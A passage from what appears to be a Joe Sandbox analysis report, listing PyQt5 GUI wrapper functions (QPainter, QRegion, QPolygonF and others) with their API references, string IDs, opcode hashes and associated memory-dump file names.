                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?parameters@DecodePictureUnicode_
                                                                                                                                                                                                                                          • String ID: QPictureIO$parameters$parameters(self) -> Optional[str]
                                                                                                                                                                                                                                          • API String ID: 2291770364-176309411
                                                                                                                                                                                                                                          • Opcode ID: 970b3cb4bb6ea70e4d416e4c643904a37fe67a490dd75f929b6762e55fb22985
                                                                                                                                                                                                                                          • Instruction ID: d9e9a2ce8fb169802bd05f82cbdedae157c1faf4c896247d76766535c47509af
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 970b3cb4bb6ea70e4d416e4c643904a37fe67a490dd75f929b6762e55fb22985
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A112172A08A46C1EB209F25D84966933E0FB44FE4F914232DAAE03360EE7CE555C344
                                                                                                                                                                                                                                          Function 00007FF89D941F10 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 42COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?beginInsertColumns@QAbstractItemModel@@IEAAXAEBVQModelIndex@@HH@Z.QT5CORE ref: 00007FF89D941F93
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?beginAbstractColumns@Index@@InsertItemModelModel@@
                                                                                                                                                                                                                                          • String ID: BJ9ii$QStandardItemModel$beginInsertColumns$beginInsertColumns(self, parent: QModelIndex, first: int, last: int)
                                                                                                                                                                                                                                          • API String ID: 4214563904-3799555195
                                                                                                                                                                                                                                          • Opcode ID: 87a85bd005ecb9a0180467e0126543098b03dd43ff15df220713baac90e3c5c1
                                                                                                                                                                                                                                          • Instruction ID: 29b20789a65c9f9f786efa913e364054e4bf6888cebaaa936e9a51bbaefbfb04
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87a85bd005ecb9a0180467e0126543098b03dd43ff15df220713baac90e3c5c1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D121F436B18F4AC5DB208F11E8896A933A4FB48BD4F914132DA9E07720EF39E959C744
                                                                                                                                                                                                                                          Function 00007FF89D993D20 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?brush@QPainter@@QEBAAEBVQBrush@@XZ.QT5GUI ref: 00007FF89D993D7D
                                                                                                                                                                                                                                          • ??0QBrush@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FF89D993D89
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Brush@@$?brush@Painter@@V0@@malloc
                                                                                                                                                                                                                                          • String ID: QPainter$brush$brush(self) -> QBrush
                                                                                                                                                                                                                                          • API String ID: 3322587729-2750601599
                                                                                                                                                                                                                                          • Opcode ID: eb3dc68d2583da2c283f275c890ba41048bcb0014eef83ec5da13e0976ce2a5b
                                                                                                                                                                                                                                          • Instruction ID: 2955b77d2f70eb29cbf36ee8bd337a7f7962aa49e76bcefd2cfd4995e98367c4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb3dc68d2583da2c283f275c890ba41048bcb0014eef83ec5da13e0976ce2a5b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99112877A18B4682EB109F21E8596A933A4FB44FD0F858032DE8E07320EF7CE559C748
                                                                                                                                                                                                                                          Function 00007FF89D9500D0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 41COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?indexFromItem@QStandardItemModel@@QEBA?AVQModelIndex@@PEBVQStandardItem@@@Z.QT5GUI ref: 00007FF89D950140
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Standard$?indexFromIndex@@ItemItem@Item@@@ModelModel@@malloc
                                                                                                                                                                                                                                          • String ID: BJ8$QStandardItemModel$indexFromItem$indexFromItem(self, item: Optional[QStandardItem]) -> QModelIndex
                                                                                                                                                                                                                                          • API String ID: 1084473625-2898275337
                                                                                                                                                                                                                                          • Opcode ID: c8cb885396bc997ed47266581ea1d422ade61b61111c77cb459d426517ebc97e
                                                                                                                                                                                                                                          • Instruction ID: 4cd515384561af24c67a061af1287fe7c05675b91fd3f3fd29d755973b89d23c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c8cb885396bc997ed47266581ea1d422ade61b61111c77cb459d426517ebc97e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4711F637A18E46C5EB109F25E8896A933A5FB48FC4F914032DA8E47320EF3DE559D744
                                                                                                                                                                                                                                          Function 00007FF89D9B3F80 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 41COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?rotatedVector@QQuaternion@@QEBA?AVQVector3D@@AEBV2@@Z.QT5GUI ref: 00007FF89D9B3FF0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?rotatedQuaternion@@V2@@Vector3Vector@malloc
                                                                                                                                                                                                                                          • String ID: BJ9$QQuaternion$rotatedVector$rotatedVector(self, vector: QVector3D) -> QVector3D
                                                                                                                                                                                                                                          • API String ID: 3025245369-297908399
                                                                                                                                                                                                                                          • Opcode ID: 016eac8f9af578e5c3cc1893eb6a1b0a21ca2e76d021840929731104c8723a4c
                                                                                                                                                                                                                                          • Instruction ID: 60dd4c614cde6936f31c99ec922b451c215747dac8f8e523c5111d5df3866c4d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 016eac8f9af578e5c3cc1893eb6a1b0a21ca2e76d021840929731104c8723a4c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0D110437A19A46C1EB109F21E8896A933E5FB48FC4F914036DA8E47324EF3DE959C744
                                                                                                                                                                                                                                          Function 00007FF89D979D80 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 40COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?subtracted@QRegion@@QEBA?AV1@AEBV1@@Z.QT5GUI ref: 00007FF89D979DE9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?subtracted@Region@@V1@@malloc
                                                                                                                                                                                                                                          • String ID: BJ9$QRegion$subtracted$subtracted(self, r: QRegion) -> QRegion
                                                                                                                                                                                                                                          • API String ID: 2522316622-1595466212
                                                                                                                                                                                                                                          • Opcode ID: b3050e84b70f8b991f91c9ae3cb8f176689861578f1b2798e05f93add30a7ef1
                                                                                                                                                                                                                                          • Instruction ID: 5d310f27425e053c242708076ac04f14a279311baa1c711da365673f013fb19c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3050e84b70f8b991f91c9ae3cb8f176689861578f1b2798e05f93add30a7ef1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 44110436A18A4681EB109F25E8892A933E5FB44FC0F914036DA8E47320EF3DE959C748
                                                                                                                                                                                                                                          Function 00007FF89D9ABDF0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 40COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?united@QPainterPath@@QEBA?AV1@AEBV1@@Z.QT5GUI ref: 00007FF89D9ABE59
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?united@PainterPath@@V1@@malloc
                                                                                                                                                                                                                                          • String ID: BJ9$QPainterPath$united$united(self, r: QPainterPath) -> QPainterPath
                                                                                                                                                                                                                                          • API String ID: 987900539-531114823
                                                                                                                                                                                                                                          • Opcode ID: 9f567e214a0b18a0e7bb0a21812fdbd784bd49fa995d17ec9562f848c1108bf7
                                                                                                                                                                                                                                          • Instruction ID: 297af23dc20684bd662ea801c5e36ae115c4acfd3b1168d85a843d6bcbec805f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f567e214a0b18a0e7bb0a21812fdbd784bd49fa995d17ec9562f848c1108bf7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0112337A08A4682EB10DF15E8896A933A5FB44B90F914036CA8E03320EF39E959C344
                                                                                                                                                                                                                                          Function 00007FF89D931F90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 40COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF89DA59D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF89D9312CB), ref: 00007FF89DA59D32
                                                                                                                                                                                                                                          • ?subtracted@QPolygonF@@QEBA?AV1@AEBV1@@Z.QT5GUI ref: 00007FF89D931FF9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?subtracted@PolygonV1@@malloc
                                                                                                                                                                                                                                          • String ID: BJ9$QPolygonF$subtracted$subtracted(self, r: QPolygonF) -> QPolygonF
                                                                                                                                                                                                                                          • API String ID: 4426677-3230020821
